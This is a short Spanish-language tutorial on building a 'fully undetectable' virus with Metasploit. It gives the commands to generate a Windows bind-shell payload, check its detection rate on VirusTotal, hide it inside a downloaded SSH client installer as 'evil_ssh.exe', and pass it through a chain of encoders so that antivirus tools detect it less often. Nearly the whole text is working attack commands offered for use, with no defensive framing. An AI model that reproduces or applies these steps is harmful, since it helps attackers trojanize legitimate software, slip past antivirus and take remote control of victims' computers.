Hacer un virus FUD (fully undetectable) a cualquier antivirus --------------------------------------------------------------- Necesitamos *metasploit (q viene con backtrack o kali linux) Creando un listener: es un payload simple que le da al atacante control remoto de la victima. No es un virus, tiene spreading, pero lo detecta los antivirus. Abrimos una terminal en backtrack y ponemos cd msfpayload windows/shell_bind_tcp LPORT=2482 X > /root/listen.exe ls -l listen.exe Tendriamos q ver un listen.exe (ls -l listen.exe) Vamos a testear el listener con virustotal. Vamos en google a virustotal Choose file, vamos a /root y subimos el listen.exe y despues a scan it. Si se ve que el archivo ya fue analizado vamos a VIew last analysis. Seguramente es detectado por varios antivirus. Codeando el listener: vamos a encodear el listener, y insertarlo en un archivo SSH inocente. en una terminal ponemos esto: wget ftp://ftp.ccsf.edu/pub/SSH/sshSecureShellClient-3.2.9.exe msfencode -i /root/listen.exe -t exe -x /root/sshSecureShellClient-3.2.9.exe -k -o /root/evil_ssh.exe -e x86/shikata_ga_nai -c 1 ls -l evil* tendriamos que ver el evil-ssh.exe Hacemos lo mismo con virus total, y segunramente estara detectado por menos antivirus. Ahora encodeamos el listener denuevo. en la terminal hacemos: msfencode -i /root/listen.exe -t raw -o /root/listen2.exe -e x86/shikata_ga_nai -c 1 msfencode -i /root/listen2.exe -t raw -o /root/listen3.exe -e x86/jmp_call_additive -c 1 msfencode -i /root/listen3.exe -t raw -o /root/listen4.exe -e x86/call4_dword_xor -c 1 msfencode -i /root/listen4.exe -o /root/listen5.exe -e x86/shikata_ga_nai -c 1ls -l listen* haciendo ls -l listen* , tendriamos que ver un par de archivos en la consola. ahora virus total deberia detectar menos.